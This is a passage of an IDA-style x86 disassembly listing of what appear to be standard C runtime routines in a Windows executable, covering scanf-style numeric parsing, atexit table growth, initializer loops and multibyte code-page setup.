loc_411137: ; CODE XREF: sub_41095C+728�j
mov [ebp+var_64], ebx
jmp loc_410FAD
; ---------------------------------------------------------------------------
loc_41113F: ; CODE XREF: sub_41095C+6C9�j
inc esi
jmp loc_410FAD
; ---------------------------------------------------------------------------
loc_411145: ; CODE XREF: sub_41095C+676�j
; sub_41095C+698�j ...
dec [ebp+var_30]
cmp eax, 0FFFFFFFFh
jz short loc_411158
push [ebp+arg_0]
push eax
call sub_414D64
pop ecx
pop ecx
loc_411158: ; CODE XREF: sub_41095C+65F�j
; sub_41095C+7EF�j
cmp esi, ebx
jz loc_4114BB
cmp [ebp+var_4B], 0
jnz loc_41142C
inc [ebp+var_34]
cmp [ebp+var_68], 63h
jz loc_41142C
mov eax, [ebp+var_64]
cmp [ebp+var_4D], 0
jz short loc_411189
and word ptr [eax], 0
jmp loc_41142C
; ---------------------------------------------------------------------------
loc_411189: ; CODE XREF: sub_41095C+822�j
and byte ptr [eax], 0
jmp loc_41142C
; ---------------------------------------------------------------------------
loc_411191: ; CODE XREF: sub_41095C+4C9�j
mov [ebp+var_4F], 1
loc_411195: ; CODE XREF: sub_41095C+263�j
; sub_41095C+275�j ...
mov ebx, [ebp+var_28]
cmp ebx, 2Dh
jnz short loc_4111A3
mov [ebp+var_4A], 1
jmp short loc_4111A8
; ---------------------------------------------------------------------------
loc_4111A3: ; CODE XREF: sub_41095C+83F�j
cmp ebx, 2Bh
jnz short loc_4111C7
loc_4111A8: ; CODE XREF: sub_41095C+845�j
dec [ebp+var_48]
jnz short loc_4111B7
test ecx, ecx
jz short loc_4111B7
mov [ebp+var_4C], 1
jmp short loc_4111C7
; ---------------------------------------------------------------------------
loc_4111B7: ; CODE XREF: sub_41095C+84F�j
; sub_41095C+853�j
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_410946
mov ebx, eax
loc_4111C4: ; CODE XREF: sub_41095C+7AC�j
mov [ebp+var_28], ebx
loc_4111C7: ; CODE XREF: sub_41095C+754�j
; sub_41095C+791�j ...
cmp [ebp+var_54], 0
jz loc_4112FE
cmp [ebp+var_4C], 0
jnz loc_4112DC
mov esi, 80h
loc_4111E0: ; CODE XREF: sub_41095C+977�j
cmp edi, 78h
jz short loc_411245
cmp edi, 70h
jz short loc_411245
cmp dword_4214F4, 1
jle short loc_4111FF
push 4
push ebx
call sub_41328D
pop ecx
pop ecx
jmp short loc_41120B
; ---------------------------------------------------------------------------
loc_4111FF: ; CODE XREF: sub_41095C+895�j
mov eax, off_4214EC
movzx eax, byte ptr [eax+ebx*2]
and eax, 4
loc_41120B: ; CODE XREF: sub_41095C+8A1�j
test eax, eax
jz short loc_411286
cmp edi, 6Fh
jnz short loc_41122E
cmp ebx, 38h
jge short loc_411286
mov eax, [ebp+var_5C]
mov ecx, [ebp+var_58]
shld ecx, eax, 3
shl eax, 3
mov [ebp+var_5C], eax
mov [ebp+var_58], ecx
jmp short loc_411289
; ---------------------------------------------------------------------------
loc_41122E: ; CODE XREF: sub_41095C+8B6�j
push 0
push 0Ah
push [ebp+var_58]
push [ebp+var_5C]
call sub_411B40
mov [ebp+var_5C], eax
mov [ebp+var_58], edx
jmp short loc_411289
; ---------------------------------------------------------------------------
loc_411245: ; CODE XREF: sub_41095C+887�j
; sub_41095C+88C�j
cmp dword_4214F4, 1
jle short loc_411259
push esi
push ebx
call sub_41328D
pop ecx
pop ecx
jmp short loc_411264
; ---------------------------------------------------------------------------
loc_411259: ; CODE XREF: sub_41095C+8F0�j
mov eax, off_4214EC
movzx eax, byte ptr [eax+ebx*2]
and eax, esi
loc_411264: ; CODE XREF: sub_41095C+8FB�j
test eax, eax
jz short loc_411286
mov eax, [ebp+var_5C]
mov ecx, [ebp+var_58]
shld ecx, eax, 4
shl eax, 4
mov [ebp+var_5C], eax
mov [ebp+var_58], ecx
mov eax, ebx
call sub_410914
mov ebx, eax
jmp short loc_411289
; ---------------------------------------------------------------------------
loc_411286: ; CODE XREF: sub_41095C+8B1�j
; sub_41095C+8BB�j ...
inc [ebp+var_4C]
loc_411289: ; CODE XREF: sub_41095C+8D0�j
; sub_41095C+8E7�j ...
cmp [ebp+var_4C], 0
jnz short loc_4112BC
inc [ebp+var_40]
lea eax, [ebx-30h]
cdq
add [ebp+var_5C], eax
adc [ebp+var_58], edx
cmp [ebp+var_44], 0
jz short loc_4112AD
dec [ebp+var_48]
jnz short loc_4112AD
mov [ebp+var_4C], 1
jmp short loc_4112CF
; ---------------------------------------------------------------------------
loc_4112AD: ; CODE XREF: sub_41095C+944�j
; sub_41095C+949�j
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_410946
mov ebx, eax
jmp short loc_4112CF
; ---------------------------------------------------------------------------
loc_4112BC: ; CODE XREF: sub_41095C+931�j
dec [ebp+var_30]
cmp ebx, 0FFFFFFFFh
jz short loc_4112CF
push [ebp+arg_0]
push ebx
call sub_414D64
pop ecx
pop ecx
loc_4112CF: ; CODE XREF: sub_41095C+94F�j
; sub_41095C+95E�j ...
cmp [ebp+var_4C], 0
jz loc_4111E0
mov [ebp+var_28], ebx
loc_4112DC: ; CODE XREF: sub_41095C+879�j
cmp [ebp+var_4A], 0
jz loc_4113EA
mov eax, [ebp+var_5C]
neg eax
mov ecx, [ebp+var_58]
adc ecx, 0
neg ecx
mov [ebp+var_5C], eax
mov [ebp+var_58], ecx
jmp loc_4113EA
; ---------------------------------------------------------------------------
loc_4112FE: ; CODE XREF: sub_41095C+86F�j
cmp [ebp+var_4C], 0
jnz loc_4113E1
mov esi, 80h
loc_41130D: ; CODE XREF: sub_41095C+A7C�j
cmp edi, 78h
jz short loc_411359
cmp edi, 70h
jz short loc_411359
cmp dword_4214F4, 1
jle short loc_41132C
push 4
push ebx
call sub_41328D
pop ecx
pop ecx
jmp short loc_411338
; ---------------------------------------------------------------------------
loc_41132C: ; CODE XREF: sub_41095C+9C2�j
mov eax, off_4214EC
movzx eax, byte ptr [eax+ebx*2]
and eax, 4
loc_411338: ; CODE XREF: sub_41095C+9CE�j
test eax, eax
jz short loc_41138B
cmp edi, 6Fh
jnz short loc_41134C
cmp ebx, 38h
jge short loc_41138B
shl [ebp+var_38], 3
jmp short loc_41138E
; ---------------------------------------------------------------------------
loc_41134C: ; CODE XREF: sub_41095C+9E3�j
mov eax, [ebp+var_38]
lea eax, [eax+eax*4]
shl eax, 1
mov [ebp+var_38], eax
jmp short loc_41138E
; ---------------------------------------------------------------------------
loc_411359: ; CODE XREF: sub_41095C+9B4�j
; sub_41095C+9B9�j
cmp dword_4214F4, 1
jle short loc_41136D
push esi
push ebx
call sub_41328D
pop ecx
pop ecx
jmp short loc_411378
; ---------------------------------------------------------------------------
loc_41136D: ; CODE XREF: sub_41095C+A04�j
mov eax, off_4214EC
movzx eax, byte ptr [eax+ebx*2]
and eax, esi
loc_411378: ; CODE XREF: sub_41095C+A0F�j
test eax, eax
jz short loc_41138B
shl [ebp+var_38], 4
mov eax, ebx
call sub_410914
mov ebx, eax
jmp short loc_41138E
; ---------------------------------------------------------------------------
loc_41138B: ; CODE XREF: sub_41095C+9DE�j
; sub_41095C+9E8�j ...
inc [ebp+var_4C]
loc_41138E: ; CODE XREF: sub_41095C+9EE�j
; sub_41095C+9FB�j ...
cmp [ebp+var_4C], 0
jnz short loc_4113C1
inc [ebp+var_40]
mov eax, [ebp+var_38]
lea eax, [eax+ebx-30h]
mov [ebp+var_38], eax
cmp [ebp+var_44], 0
jz short loc_4113B2
dec [ebp+var_48]
jnz short loc_4113B2
mov [ebp+var_4C], 1
jmp short loc_4113D4
; ---------------------------------------------------------------------------
loc_4113B2: ; CODE XREF: sub_41095C+A49�j
; sub_41095C+A4E�j
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_410946
mov ebx, eax
jmp short loc_4113D4
; ---------------------------------------------------------------------------
loc_4113C1: ; CODE XREF: sub_41095C+A36�j
dec [ebp+var_30]
cmp ebx, 0FFFFFFFFh
jz short loc_4113D4
push [ebp+arg_0]
push ebx
call sub_414D64
pop ecx
pop ecx
loc_4113D4: ; CODE XREF: sub_41095C+A54�j
; sub_41095C+A63�j ...
cmp [ebp+var_4C], 0
jz loc_41130D
mov [ebp+var_28], ebx
loc_4113E1: ; CODE XREF: sub_41095C+9A6�j
cmp [ebp+var_4A], 0
jz short loc_4113EA
neg [ebp+var_38]
loc_4113EA: ; CODE XREF: sub_41095C+984�j
; sub_41095C+99D�j ...
cmp edi, 46h
jnz short loc_4113F3
and [ebp+var_40], 0
loc_4113F3: ; CODE XREF: sub_41095C+A91�j
cmp [ebp+var_40], 0
jz loc_4114BB
cmp [ebp+var_4B], 0
jnz short loc_41142C
inc [ebp+var_34]
mov ebx, [ebp+var_64]
mov eax, [ebp+var_38]
loc_41140C: ; CODE XREF: sub_41095C+29B�j
cmp [ebp+var_54], 0
jz short loc_41141F
mov eax, [ebp+var_5C]
mov [ebx], eax
mov eax, [ebp+var_58]
mov [ebx+4], eax
jmp short loc_41142C
; ---------------------------------------------------------------------------
loc_41141F: ; CODE XREF: sub_41095C+AB4�j
cmp [ebp+var_4F], 0
jz short loc_411429
mov [ebx], eax
jmp short loc_41142C
; ---------------------------------------------------------------------------
loc_411429: ; CODE XREF: sub_41095C+AC7�j
mov [ebx], ax
loc_41142C: ; CODE XREF: sub_41095C+2A1�j
; sub_41095C+479�j ...
inc [ebp+var_29]
inc [ebp+arg_4]
mov esi, [ebp+arg_4]
jmp short loc_41149F
; ---------------------------------------------------------------------------
loc_411437: ; CODE XREF: sub_41095C+AD�j
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_410946
mov ebx, eax
mov [ebp+var_28], ebx
movzx eax, byte ptr [esi]
inc esi
mov [ebp+arg_4], esi
cmp eax, ebx
jnz short loc_411488
movzx eax, bl
mov ecx, off_4214EC
test byte ptr [ecx+eax*2+1], 80h
jz short loc_41149F
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_410946
movzx ecx, byte ptr [esi]
inc esi
mov [ebp+arg_4], esi
cmp ecx, eax
jz short loc_41149C
cmp eax, 0FFFFFFFFh
jz short loc_411488
push [ebp+arg_0]
push eax
call sub_414D64
pop ecx
pop ecx
loc_411488: ; CODE XREF: sub_41095C+AF4�j
; sub_41095C+B1F�j
cmp ebx, 0FFFFFFFFh
loc_41148B: ; CODE XREF: sub_41095C+4F6�j
jz short loc_4114BB
push [ebp+arg_0]
push [ebp+var_28]
call sub_414D64
pop ecx
pop ecx
jmp short loc_4114BB
; ---------------------------------------------------------------------------
loc_41149C: ; CODE XREF: sub_41095C+B1A�j
dec [ebp+var_30]
loc_41149F: ; CODE XREF: sub_41095C+AD9�j
; sub_41095C+B04�j
cmp [ebp+var_28], 0FFFFFFFFh
jnz loc_41098D
cmp byte ptr [esi], 25h
jnz short loc_4114BB
mov eax, [ebp+arg_4]
cmp byte ptr [eax+1], 6Eh
jz loc_41098A
loc_4114BB: ; CODE XREF: sub_41095C+35�j
; sub_41095C+46F�j ...
cmp [ebp+var_24], 1
jnz short loc_4114CA
push [ebp+var_20]
call sub_40E359
pop ecx
loc_4114CA: ; CODE XREF: sub_41095C+B63�j
mov eax, [ebp+var_34]
cmp [ebp+var_28], 0FFFFFFFFh
jnz short loc_4114DF
test eax, eax
jnz short loc_4114DF
cmp [ebp+var_29], al
jnz short loc_4114DF
or eax, 0FFFFFFFFh
loc_4114DF: ; CODE XREF: sub_41095C+B75�j
; sub_41095C+B79�j ...
lea esp, [ebp-1E4h]
mov ecx, [ebp+var_1C]
xor ecx, [ebp+4]
call sub_411BA5
call __SEH_epilog
retn
sub_41095C endp
; =============== S U B R O U T I N E =======================================
sub_4114F6 proc near ; CODE XREF: sub_411578+4�p
arg_0 = dword ptr 4
push esi
push dword_4C5ECC
call sub_4150F4
pop ecx
mov ecx, dword_4C5EC8
mov esi, eax
mov eax, dword_4C5ECC
mov edx, ecx
sub edx, eax
add edx, 4
cmp esi, edx
jnb short loc_411569
mov ecx, 800h
cmp esi, ecx
jnb short loc_411526
mov ecx, esi
loc_411526: ; CODE XREF: sub_4114F6+2C�j
add ecx, esi
push ecx
push eax
call sub_414F92
test eax, eax
pop ecx
pop ecx
jnz short loc_41154C
add esi, 10h
push esi
push dword_4C5ECC
call sub_414F92
test eax, eax
pop ecx
pop ecx
jnz short loc_41154C
pop esi
retn
; ---------------------------------------------------------------------------
loc_41154C: ; CODE XREF: sub_4114F6+3D�j
; sub_4114F6+52�j
mov ecx, dword_4C5EC8
sub ecx, dword_4C5ECC
mov dword_4C5ECC, eax
sar ecx, 2
lea ecx, [eax+ecx*4]
mov dword_4C5EC8, ecx
loc_411569: ; CODE XREF: sub_4114F6+23�j
mov eax, [esp+4+arg_0]
mov [ecx], eax
add dword_4C5EC8, 4
pop esi
retn
sub_4114F6 endp
; =============== S U B R O U T I N E =======================================
sub_411578 proc near ; CODE XREF: sub_40DD0D+6B�p
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_4114F6
neg eax
sbb eax, eax
neg eax
pop ecx
dec eax
retn
sub_411578 endp
; =============== S U B R O U T I N E =======================================
sub_41158A proc near ; DATA XREF: .text:0041E018�o
push 80h
call sub_40E74F
test eax, eax
pop ecx
mov dword_4C5ECC, eax
jnz short loc_4115A2
push 18h
pop eax
retn
; ---------------------------------------------------------------------------
loc_4115A2: ; CODE XREF: sub_41158A+12�j
and dword ptr [eax], 0
mov eax, dword_4C5ECC
mov dword_4C5EC8, eax
xor eax, eax
retn
sub_41158A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4115B2 proc near ; CODE XREF: .text:loc_40F945�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset stru_41BC50
call __SEH_prolog
mov [ebp+var_1C], offset dword_41CA6C
loc_4115C5: ; CODE XREF: sub_4115B2+3C�j
cmp [ebp+var_1C], offset dword_41CA6C
jnb short loc_4115F0
and [ebp+ms_exc.disabled], 0
mov eax, [ebp+var_1C]
mov eax, [eax]
test eax, eax
jz short loc_4115E6
call eax
jmp short loc_4115E6
; ---------------------------------------------------------------------------
loc_4115DF: ; DATA XREF: .text:stru_41BC50�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_4115E3: ; DATA XREF: .text:stru_41BC50�o
mov esp, [ebp+ms_exc.old_esp]
loc_4115E6: ; CODE XREF: sub_4115B2+27�j
; sub_4115B2+2B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
add [ebp+var_1C], 4
jmp short loc_4115C5
; ---------------------------------------------------------------------------
loc_4115F0: ; CODE XREF: sub_4115B2+1A�j
call __SEH_epilog
retn
sub_4115B2 endp
; ---------------------------------------------------------------------------
loc_4115F6: ; DATA XREF: sub_40DD0D:loc_40DD73�o
push 0Ch
push offset stru_41BC60
call __SEH_prolog
mov dword ptr [ebp-1Ch], offset dword_41CA74
loc_411609: ; CODE XREF: .text:00411632�j
cmp dword ptr [ebp-1Ch], offset dword_41CA74
jnb short loc_411634
and dword ptr [ebp-4], 0
mov eax, [ebp-1Ch]
mov eax, [eax]
test eax, eax
jz short loc_41162A
call eax
jmp short loc_41162A
; ---------------------------------------------------------------------------
loc_411623: ; DATA XREF: .text:stru_41BC60�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_411627: ; DATA XREF: .text:stru_41BC60�o
mov esp, [ebp-18h]
loc_41162A: ; CODE XREF: .text:0041161D�j
; .text:00411621�j
or dword ptr [ebp-4], 0FFFFFFFFh
add dword ptr [ebp-1Ch], 4
jmp short loc_411609
; ---------------------------------------------------------------------------
loc_411634: ; CODE XREF: .text:00411610�j
call __SEH_epilog
retn
; =============== S U B R O U T I N E =======================================
sub_41163A proc near ; CODE XREF: sub_411824+15A�p
; sub_411824+19F�p
sub eax, 3A4h
jz short loc_411663
sub eax, 4
jz short loc_41165D
sub eax, 0Dh
jz short loc_411657
dec eax
jz short loc_411651
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_411651: ; CODE XREF: sub_41163A+12�j
mov eax, 404h
retn
; ---------------------------------------------------------------------------
loc_411657: ; CODE XREF: sub_41163A+F�j
mov eax, 412h
retn
; ---------------------------------------------------------------------------
loc_41165D: ; CODE XREF: sub_41163A+A�j
mov eax, 804h
retn
; ---------------------------------------------------------------------------
loc_411663: ; CODE XREF: sub_41163A+5�j
mov eax, 411h
retn
sub_41163A endp
; =============== S U B R O U T I N E =======================================
sub_411669 proc near ; CODE XREF: sub_411824:loc_4119EF�p
push edi
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_4C5B80
rep stosd
stosb
xor eax, eax
mov dword_4C5C84, eax
mov dword_4C5B70, eax
mov dword_4C5B6C, eax
mov edi, offset dword_4C5C90
stosd
stosd
stosd
pop edi
retn
sub_411669 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411692 proc near ; CODE XREF: sub_411824:loc_4119F4�p
var_518 = word ptr -518h
var_318 = byte ptr -318h
var_218 = byte ptr -218h
var_118 = byte ptr -118h
var_18 = byte ptr -18h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 518h
mov eax, dword_421360
xor eax, [ebp+4]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+var_18]
push eax
push dword_4C5C84
call dword_4191A4 ; GetCPInfo
cmp eax, 1
mov esi, 100h
jnz loc_4117D2
xor eax, eax
loc_4116C7: ; CODE XREF: sub_411692+3F�j
mov [ebp+eax+var_118], al
inc eax
cmp eax, esi
jb short loc_4116C7
mov al, [ebp+var_12]
test al, al
mov [ebp+var_118], 20h
jz short loc_411717
push ebx
lea edx, [ebp+var_11]
push edi
loc_4116E6: ; CODE XREF: sub_411692+81�j
movzx ecx, byte ptr [edx]
movzx eax, al
cmp eax, ecx
ja short loc_41170D
sub ecx, eax
inc ecx
mov ebx, ecx
shr ecx, 2
lea edi, [ebp+eax+var_118]
mov eax, 20202020h
rep stosd
mov ecx, ebx
and ecx, 3
rep stosb
loc_41170D: ; CODE XREF: sub_411692+5C�j
inc edx
mov al, [edx]
inc edx
test al, al
jnz short loc_4116E6
pop edi
pop ebx
loc_411717: ; CODE XREF: sub_411692+4D�j
push 0
push dword_4C5B6C
lea eax, [ebp+var_518]
push dword_4C5C84
push eax
push esi
lea eax, [ebp+var_118]
push eax
push 1
call sub_41512C
push 0
push dword_4C5C84
lea eax, [ebp+var_218]
push esi
push eax
push esi
lea eax, [ebp+var_118]
push eax
push esi
push dword_4C5B6C
call sub_412ED1
push 0
push dword_4C5C84
lea eax, [ebp+var_318]
push esi
push eax
push esi
lea eax, [ebp+var_118]
push eax
push 200h
push dword_4C5B6C
call sub_412ED1
add esp, 5Ch
xor eax, eax
loc_41178C: ; CODE XREF: sub_411692+13C�j
mov cx, [ebp+eax*2+var_518]
test cl, 1
jz short loc_4117AF
or byte_4C5B81[eax], 10h
mov cl, [ebp+eax+var_218]
loc_4117A7: ; CODE XREF: sub_411692+130�j
mov byte_4C5CA0[eax], cl
jmp short loc_4117CB
; ---------------------------------------------------------------------------
loc_4117AF: ; CODE XREF: sub_411692+105�j
test cl, 2
jz short loc_4117C4
or byte_4C5B81[eax], 20h
mov cl, [ebp+eax+var_318]
jmp short loc_4117A7
; ---------------------------------------------------------------------------
loc_4117C4: ; CODE XREF: sub_411692+120�j
and byte_4C5CA0[eax], 0
loc_4117CB: ; CODE XREF: sub_411692+11B�j
inc eax
cmp eax, esi
jb short loc_41178C
jmp short loc_411816
; ---------------------------------------------------------------------------
loc_4117D2: ; CODE XREF: sub_411692+2D�j
xor eax, eax
loc_4117D4: ; CODE XREF: sub_411692+182�j
cmp eax, 41h
jb short loc_4117F2
cmp eax, 5Ah
ja short loc_4117F2
or byte_4C5B81[eax], 10h
mov cl, al
add cl, 20h
loc_4117EA: ; CODE XREF: sub_411692+176�j
mov byte_4C5CA0[eax], cl
jmp short loc_411811
; ---------------------------------------------------------------------------
loc_4117F2: ; CODE XREF: sub_411692+145�j
; sub_411692+14A�j
cmp eax, 61h
jb short loc_41180A
cmp eax, 7Ah
ja short loc_41180A
or byte_4C5B81[eax], 20h
mov cl, al
sub cl, 20h
jmp short loc_4117EA
; ---------------------------------------------------------------------------
loc_41180A: ; CODE XREF: sub_411692+163�j
; sub_411692+168�j
and byte_4C5CA0[eax], 0
loc_411811: ; CODE XREF: sub_411692+15E�j
inc eax
cmp eax, esi
jb short loc_4117D4
loc_411816: ; CODE XREF: sub_411692+13E�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop esi
call sub_411BA5
leave
retn
sub_411692 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411824 proc near ; CODE XREF: sub_411A10+B�p
var_1C = dword ptr -1Ch
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
mov eax, dword_421360
xor eax, [ebp+4]
push ebx
push esi
mov esi, [ebp+arg_0]
xor ebx, ebx
cmp esi, 0FFFFFFFEh
mov [ebp+var_4], eax
push edi
mov dword_4C5970, ebx
jnz short loc_41185A
mov dword_4C5970, 1
call dword_4191A8 ; GetOEMCP
jmp short loc_411885
; ---------------------------------------------------------------------------
loc_41185A: ; CODE XREF: sub_411824+22�j
cmp esi, 0FFFFFFFDh
jnz short loc_411871
mov dword_4C5970, 1
call dword_4191AC ; GetACP
jmp short loc_411885
; ---------------------------------------------------------------------------
loc_411871: ; CODE XREF: sub_411824+39�j
cmp esi, 0FFFFFFFCh
jnz short loc_41188A
mov eax, dword_4C59A8
mov dword_4C5970, 1
loc_411885: ; CODE XREF: sub_411824+34�j
; sub_411824+4B�j
mov [ebp+arg_0], eax
mov esi, eax
loc_41188A: ; CODE XREF: sub_411824+50�j
cmp esi, dword_4C5C84
jz loc_4119F9
cmp esi, ebx
jz loc_4119EF
xor edx, edx
xor eax, eax
loc_4118A2: ; CODE XREF: sub_411824+8F�j
cmp dword_421270[eax], esi
jz short loc_411911
add eax, 30h
inc edx
cmp eax, 0F0h
jb short loc_4118A2
lea eax, [ebp+var_1C]
push eax
push esi
call dword_4191A4 ; GetCPInfo
cmp eax, 1
jnz loc_4119E7
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_4C5B80
rep stosd
stosb
xor edi, edi
inc edi
cmp [ebp+var_1C], edi
mov dword_4C5C84, esi
mov dword_4C5B6C, ebx
jbe loc_4119D5
cmp [ebp+var_16], 0
jz loc_4119B0
lea ecx, [ebp+var_15]
loc_4118FB: ; CODE XREF: sub_411824+186�j
mov dl, [ecx]
test dl, dl
jz loc_4119B0
movzx eax, byte ptr [ecx-1]
movzx edx, dl
jmp loc_4119A0
; ---------------------------------------------------------------------------
loc_411911: ; CODE XREF: sub_411824+84�j
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_4C5B80
rep stosd
lea ecx, [edx+edx*2]
shl ecx, 4
mov [ebp+var_8], ebx
stosb
lea ebx, dword_421280[ecx]
loc_41192D: ; CODE XREF: sub_411824+146�j
mov al, [ebx]
mov esi, ebx
jmp short loc_41195C
; ---------------------------------------------------------------------------
loc_411933: ; CODE XREF: sub_411824+13A�j
mov dl, [esi+1]
test dl, dl
jz short loc_411960
movzx eax, al
movzx edi, dl
cmp eax, edi
ja short loc_411958
mov edx, [ebp+var_8]
mov dl, byte_421268[edx]
loc_41194D: ; CODE XREF: sub_411824+132�j
or byte_4C5B81[eax], dl
inc eax
cmp eax, edi
jbe short loc_41194D
loc_411958: ; CODE XREF: sub_411824+11E�j
inc esi
inc esi
mov al, [esi]
loc_41195C: ; CODE XREF: sub_411824+10D�j
test al, al
jnz short loc_411933
loc_411960: ; CODE XREF: sub_411824+114�j
inc [ebp+var_8]
add ebx, 8
cmp [ebp+var_8], 4
jb short loc_41192D
mov eax, [ebp+arg_0]
mov dword_4C5C84, eax
mov dword_4C5B70, 1
call sub_41163A
lea esi, dword_421274[ecx]
mov edi, offset dword_4C5C90
movsd
movsd
mov dword_4C5B6C, eax
movsd
jmp short loc_4119F4
; ---------------------------------------------------------------------------
loc_411998: ; CODE XREF: sub_411824+17E�j
or byte_4C5B81[eax], 4
inc eax
loc_4119A0: ; CODE XREF: sub_411824+E8�j
cmp eax, edx
jbe short loc_411998
inc ecx
inc ecx
cmp byte ptr [ecx-1], 0
jnz loc_4118FB
loc_4119B0: ; CODE XREF: sub_411824+CE�j
; sub_411824+DB�j
mov eax, edi
loc_4119B2: ; CODE XREF: sub_411824+19B�j
or byte_4C5B81[eax], 8
inc eax
cmp eax, 0FFh
jb short loc_4119B2
mov eax, esi
call sub_41163A
mov dword_4C5B6C, eax
mov dword_4C5B70, edi
jmp short loc_4119DB
; ---------------------------------------------------------------------------
loc_4119D5: ; CODE XREF: sub_411824+C4�j
mov dword_4C5B70, ebx
loc_4119DB: ; CODE XREF: sub_411824+1AF�j
xor eax, eax
mov edi, offset dword_4C5C90
stosd
stosd
stosd
jmp short loc_4119F4
; ---------------------------------------------------------------------------
loc_4119E7: ; CODE XREF: sub_411824+9F�j
cmp dword_4C5970, ebx
jz short loc_4119FD
loc_4119EF: ; CODE XREF: sub_411824+74�j
call sub_411669
loc_4119F4: ; CODE XREF: sub_411824+172�j
; sub_411824+1C1�j
call sub_411692
loc_4119F9: ; CODE XREF: sub_411824+6C�j
xor eax, eax
jmp short loc_411A00
; ---------------------------------------------------------------------------
loc_4119FD: ; CODE XREF: sub_411824+1C9�j
or eax, 0FFFFFFFFh
loc_411A00: ; CODE XREF: sub_411824+1D7�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop edi
pop esi
pop ebx
call sub_411BA5
leave
retn
sub_411824 endp
; =============== S U B R O U T I N E =======================================
sub_411A10 proc near ; CODE XREF: sub_4147D3+9�p
; sub_41483C+D�p ...
cmp dword_4C5ED0, 0
jnz short loc_411A2B
push 0FFFFFFFDh
call sub_411824
pop ecx
mov dword_4C5ED0, 1
loc_411A2B: ; CODE XREF: sub_411A10+7�j
xor eax, eax
retn
sub_411A10 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411A2E proc near ; CODE XREF: sub_40DEA4+2C�p
; sub_40DEA4+A7�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp dword_4C5B70, 0
push edi
mov edi, [ebp+arg_0]
mov [ebp+arg_0], edi
jnz short loc_411A52
push [ebp+arg_8]
push [ebp+arg_4]
push edi
call sub_40DB80
add esp, 0Ch
jmp short loc_411A9A
; ---------------------------------------------------------------------------
loc_411A52: ; CODE XREF: sub_411A2E+11�j
mov ecx, [ebp+arg_8]
test ecx, ecx
jz short loc_411A97
mov edx, [ebp+arg_4]
push esi
loc_411A5D: ; CODE XREF: sub_411A2E+77�j
mov al, [edx]
movzx esi, al
dec ecx
test byte_4C5B81[esi], 4
mov [edi], al
jz short loc_411A9D
inc edi
inc edx
test ecx, ecx
jz short loc_411AA9
mov al, [edx]
dec ecx
mov [edi], al
inc edi
inc edx
test al, al
jnz short loc_411AA3
and [edi-2], al
loc_411A82: ; CODE XREF: sub_411A2E+73�j
test ecx, ecx
jz short loc_411A96
mov edx, ecx
shr ecx, 2
xor eax, eax
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
loc_411A96: ; CODE XREF: sub_411A2E+56�j
; sub_411A2E+79�j ...
pop esi
loc_411A97: ; CODE XREF: sub_411A2E+29�j
mov eax, [ebp+arg_0]
loc_411A9A: ; CODE XREF: sub_411A2E+22�j
pop edi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_411A9D: ; CODE XREF: sub_411A2E+3E�j
inc edi
inc edx
test al, al
jz short loc_411A82
loc_411AA3: ; CODE XREF: sub_411A2E+4F�j
test ecx, ecx
jnz short loc_411A5D
jmp short loc_411A96
; ---------------------------------------------------------------------------
loc_411AA9: ; CODE XREF: sub_411A2E+44�j
and byte ptr [edi-1], 0
jmp short loc_411A96
sub_411A2E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411AAF proc near ; CODE XREF: sub_40E070+C�p
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
cmp ecx, 0FFh
jbe short loc_411B1C
and [ebp+var_4], 0
push edi
xor eax, eax
lea edi, [ebp+var_2]
stosw
mov eax, ecx
shr eax, 8
cmp dword_4C5B70, 0
mov byte ptr [ebp+arg_0+2], al
mov byte ptr [ebp+arg_0+3], cl
pop edi
jnz short loc_411AE4
loc_411AE0: ; CODE XREF: sub_411AAF+59�j
; sub_411AAF+60�j ...
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_411AE4: ; CODE XREF: sub_411AAF+2F�j
push 1
push dword_4C5B6C
lea eax, [ebp+var_4]
push dword_4C5C84
push eax
push 2
lea eax, [ebp+arg_0+2]
push eax
push 1
call sub_41512C
add esp, 1Ch
test eax, eax
jz short loc_411AE0
cmp [ebp+var_2], 0
jnz short loc_411AE0
test byte ptr [ebp+var_4], 8
jz short loc_411AE0
xor eax, eax
inc eax
leave
retn
; ---------------------------------------------------------------------------
loc_411B1C: ; CODE XREF: sub_411AAF+D�j
cmp dword_4214F4, 1
jle short loc_411B31
push 8
push ecx
call sub_41328D
pop ecx
pop ecx
leave
retn
; ---------------------------------------------------------------------------
loc_411B31: ; CODE XREF: sub_411AAF+74�j
mov eax, off_4214EC
movzx eax, byte ptr [eax+ecx*2]
and eax, 8
leave
retn
sub_411AAF endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
